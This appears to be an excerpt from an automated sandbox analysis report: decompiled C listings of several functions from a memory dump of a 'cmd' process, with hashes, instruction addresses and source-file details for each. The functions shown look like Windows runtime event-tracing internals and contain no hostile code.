Opcode Fuzzy Hash: 4887f5ffc7993edbacaceb5a2118bbf4447699bbebcb982014185b24361ecb71
Instruction Fuzzy Hash: 75018875A106889BC714EE6ADD04ABEF7B8EB46130B9940ADDA169B344DF30ED05C650

Uniqueness

Uniqueness Score: -1.00%

Function 03791074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03791074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0379165E(__ebx, 0x37b8ae4, (__edx -  *0x37b8b04 >> 0x14) + (__edx -  *0x37b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x37b8b04 >> 0x14) + (__edx -  *0x37b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0378AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E036E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0377FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x03791074
0x03791080
0x03791082
0x0379108a
0x0379108f
0x03791093
0x037910ab
0x037910ab
0x037910c3
0x037910cf
0x037910e1
0x037910d1
0x037910da
0x037910da
0x037910e9
0x037910f5
0x037910f5
0x037910fe

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1556aabff7049292a75b2aeb54cfd4a242e29944c5b6c37afc9545bc1adf86
Instruction ID: 671f9cb2cd2b110a41e8abedeaebc307f90c2b9f7ebf8c1209c3cb290475ac0f
Opcode Fuzzy Hash: 0d1556aabff7049292a75b2aeb54cfd4a242e29944c5b6c37afc9545bc1adf86
Instruction Fuzzy Hash: 7B014C7650474AEFDB10EF69D944B1AB7E9AF84310F44C62AF89587290EE31D450CB92

Uniqueness

Uniqueness Score: -1.00%

Function 036DB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E036E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03747016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x036db037
0x036db039
0x036db03b
0x036db040
0x0372a60e
0x00000000
0x00000000
0x0372a61d
0x036db04b
0x036db04e
0x0372a627
0x0372a634
0x00000000
0x00000000
0x0372a641
0x0372a653
0x0372a643
0x0372a64c
0x0372a64c
0x0372a65b
0x00000000
0x00000000
0x00000000
0x0372a66c
0x036db057
0x036db057
0x036db057
0x036db046
0x036db046
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: ee09ad2f4b829e398ad73c9bd170311df3fd4af8e8b1f55055111834fd8b5b5e
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 19018F32605A84DFD726C75CD988F76BBDCEB45B50F0E00A1F919CBA65DB28DC40C625

Uniqueness

Uniqueness Score: -1.00%

Function 0377FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0377FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x37bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0370FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0377fe3f
0x0377fe3f
0x0377fe4e
0x0377fe58
0x0377fe5d
0x0377fe5f
0x0377fe6a
0x0377fe72
0x0377fe75
0x0377fe78
0x0377fe83
0x0377fe95
0x0377fe85
0x0377fe8e
0x0377fe8e
0x0377fea0
0x0377fea1
0x0377fea3
0x0377fea8
0x0377febd

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a656203895ae0d2d07ad395486125c009f1334c93850d23808d1ba56753b6059
Instruction ID: a02fbb481aa26478de5378b55019a31f070b8ceaf55c5cde1e19ac3bd987dae8
Opcode Fuzzy Hash: a656203895ae0d2d07ad395486125c009f1334c93850d23808d1ba56753b6059
Instruction Fuzzy Hash: 86018F75A01308EBCB14EFA9D845FAEBBB8EF44700F00406AF900EB291DA74DA01C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0377FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0377FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x37bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0370FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0377fec0
0x0377fec0
0x0377fecf
0x0377fed9
0x0377fede
0x0377fee0
0x0377feeb
0x0377fef3
0x0377fef6
0x0377fef9
0x0377ff04
0x0377ff16
0x0377ff06
0x0377ff0f
0x0377ff0f
0x0377ff21
0x0377ff22
0x0377ff24
0x0377ff29
0x0377ff3e

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64da48e165a02d73a53c98d12af4ba6726736239cdca95db17214d89ff53e921
Instruction ID: bf72032f8177b8277a2b9dae3ba0627fcf6d9203a1177f7979db81d8346f2ba0
Opcode Fuzzy Hash: 64da48e165a02d73a53c98d12af4ba6726736239cdca95db17214d89ff53e921
Instruction Fuzzy Hash: 86018475A01308EBCB14DFA9D845FAEB7B8EF45700F004066F900EB291EA74DA01C794

Uniqueness

Uniqueness Score: -1.00%

Function 03798A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E03798A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x37bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x03798a62
0x03798a71
0x03798a79
0x03798a82
0x03798a85
0x03798a89
0x03798a8c
0x03798a8f
0x03798a92
0x03798a95
0x03798a9f
0x03798ab1
0x03798aa1
0x03798aaa
0x03798aaa
0x03798abc
0x03798abd
0x03798abf
0x03798ac4
0x03798ada

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2420d638e58cbd82a9de409d14125886aed13d3a67d50fb0f2adc577345f016
Instruction ID: 70baaa88051dba16301559b9744585c8ed7aa5efb5b808c191ff7408d385d36f
Opcode Fuzzy Hash: d2420d638e58cbd82a9de409d14125886aed13d3a67d50fb0f2adc577345f016
Instruction Fuzzy Hash: 8E011E75A0121CAFDB00DFA9E9859AEB7B8EF49310F10405AF904EB351D674A900CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 03798ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E03798ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x37bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E036E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0370B640(E03709AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x03798ed6
0x03798ee5
0x03798eed
0x03798ef0
0x03798efa
0x03798f03
0x03798f0c
0x03798f15
0x03798f24
0x03798f27
0x03798f31
0x03798f43
0x03798f33
0x03798f3c
0x03798f3c
0x03798f4e
0x03798f4f
0x03798f51
0x03798f56
0x03798f69

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ab3e8efad4213306d8d7d3b8316aae28d854735cff1a09abebfbfd6e2625bb
Instruction ID: c4243c9522f92590f2f3949e0e3dead33692912a3b9de2fe1b1489e1ea86bcf2
Opcode Fuzzy Hash: b5ab3e8efad4213306d8d7d3b8316aae28d854735cff1a09abebfbfd6e2625bb
Instruction Fuzzy Hash: 7E111E74A00209DFDB04DFA8D445BAEF7F4FF08300F0442AAE518EB382E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 036CDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E036CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E036CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L036CE8B0(__ecx, _t14, 0xfff);
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x036cdb64
0x036cdb66
0x036cdb6b
0x036cdbaa
0x036cdb71
0x036cdb76
0x036cdb7a
0x036cdba3
0x036cdb7c
0x036cdb87
0x036cdb8b
0x03724fa1
0x03724fb3
0x03724fb8
0x036cdb91
0x036cdb96
0x036cdb98
0x036cdb98
0x036cdb8b
0x036cdb7a
0x036cdb9d
0x036cdba2

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 20f975ab9637448d1a5555c092073e1d69ec2cd2f5503f5ff9d0cc3e56980e63
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 57F0FC776216A29BD732DA5548C4F37F6B5DFD1A60F19003DF1099F344C9608C0296E4

Uniqueness

Uniqueness Score: -1.00%

Function 036CB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E036E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E036E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03747016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x036cb1e8
0x036cb1ea
0x036cb1f3
0x03724a17
0x036cb1f9
0x036cb1f9
0x036cb1f9
0x036cb201
0x03724a21
0x03724a2e
0x00000000
0x00000000
0x03724a3b
0x03724a4d
0x03724a3d
0x03724a46
0x03724a46
0x03724a55
0x00000000
0x00000000
0x00000000
0x036cb20a
0x036cb20a
0x036cb20a
0x036cb20a

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 16ce27d79ccf9cf2bf3101f7b8783f4fe86456ade1dd8e3129698812d7fdf684
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 3401D1322116C4DBD322D76AD949F79BFA8EF51750F0D00A5F9148B6B1D679C800C258

Uniqueness

Uniqueness Score: -1.00%

Function 0375FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0375FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x37bd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0370B640(E03709AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0375fe96
0x0375fe9e
0x0375fea1
0x0375fead
0x0375feb3
0x0375feb9
0x0375fec3
0x0375fed5
0x0375fec5
0x0375fece
0x0375fece
0x0375fee0
0x0375fee1
0x0375fee3
0x0375fee8
0x0375fefb

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fc55f69c6b5f5e967c7469a6b1229c1fc3358c3b4152969f1422b3f7e64fa9
Instruction ID: a5d744180489af38f82703313e2c7424a5edac61a7d0f6c1cc7c7b2a510ed742
Opcode Fuzzy Hash: 29fc55f69c6b5f5e967c7469a6b1229c1fc3358c3b4152969f1422b3f7e64fa9
Instruction Fuzzy Hash: A701FF74A04208EFCB54DFA8D546A6EB7F4EF08304F144169B915EB392D675DA01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0378131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0378131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x37bd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0378131b
0x0378132a
0x03781330
0x03781336
0x0378133e
0x03781341
0x03781344
0x0378134f
0x03781361
0x03781351
0x0378135a
0x0378135a
0x0378136c
0x0378136d
0x0378136f
0x03781374
0x03781387

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4042893af386293433524d8c7a457bba4ba60b54e3ccd794f8720a70c3ff48
Instruction ID: d236a740c33d7558ee73ea7aceacc09e42659d4cc8f1429edec0e39adb5b7918
Opcode Fuzzy Hash: 7c4042893af386293433524d8c7a457bba4ba60b54e3ccd794f8720a70c3ff48
Instruction Fuzzy Hash: 2A011975A01208EFCB04EFA9D545AAEB7F4EF08700F408069B905EB391E6749A00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 03798F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E03798F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x37bd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x03798f6a
0x03798f79
0x03798f81
0x03798f84
0x03798f8b
0x03798f91
0x03798f94
0x03798f9e
0x03798fb0
0x03798fa0
0x03798fa9
0x03798fa9
0x03798fbb
0x03798fbc
0x03798fbe
0x03798fc3
0x03798fd6

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7ef92c47e1f87b269b89fbbf165032cc963e9393e2d8dd3593edcb60eb821c
Instruction ID: 2e14bc8ef59704e3b483181d4c0cac51f37c7dc29ace2b174d02fe291666831e
Opcode Fuzzy Hash: ca7ef92c47e1f87b269b89fbbf165032cc963e9393e2d8dd3593edcb60eb821c
Instruction Fuzzy Hash: 1C014474A0120CEFDB00EFA8E545AAEB7F4EF08300F10405AB905EB381EB74DA00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03781608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E03781608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x37bd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E036E7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0370B640(E03709AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x03781608
0x03781617
0x0378161d
0x03781625
0x03781628
0x0378162b
0x03781636
0x03781648
0x03781638
0x03781641
0x03781641
0x03781653
0x03781654
0x03781656
0x0378165b
0x0378166e

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56e926e82e72fd57ca9480c518dbfa01526e43c93e568a4383d04e724106765
Instruction ID: 5756dce845fd09e198bf0d2214fa72a1e6cf6c61ddcdf1a7bb905829f4500c37
Opcode Fuzzy Hash: b56e926e82e72fd57ca9480c518dbfa01526e43c93e568a4383d04e724106765
Instruction Fuzzy Hash: 9DF06D75A05348EFCB14EFE8D445EAEB7F4EF08300F4440A9A905EB391EA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036EC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036EC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E036EC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x36a11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E037988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x036ec577
0x036ec57d
0x036ec581
0x036ec5b5
0x036ec5b9
0x036ec5ce
0x036ec5ce
0x036ec5ca
0x00000000
0x036ec5ca
0x036ec5c4
0x036ec5c8
0x00000000
0x00000000
0x00000000
0x036ec5ad
0x00000000
0x036ec5af

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a1b26018e74e050762bab45b53e8a4770c3d441e8c158f179264ec250b66ad
Instruction ID: efebb42e2ca082f70941ea2d47b46d7424dad60a953d86ab56e472321262ad8b
Opcode Fuzzy Hash: 54a1b26018e74e050762bab45b53e8a4770c3d441e8c158f179264ec250b66ad
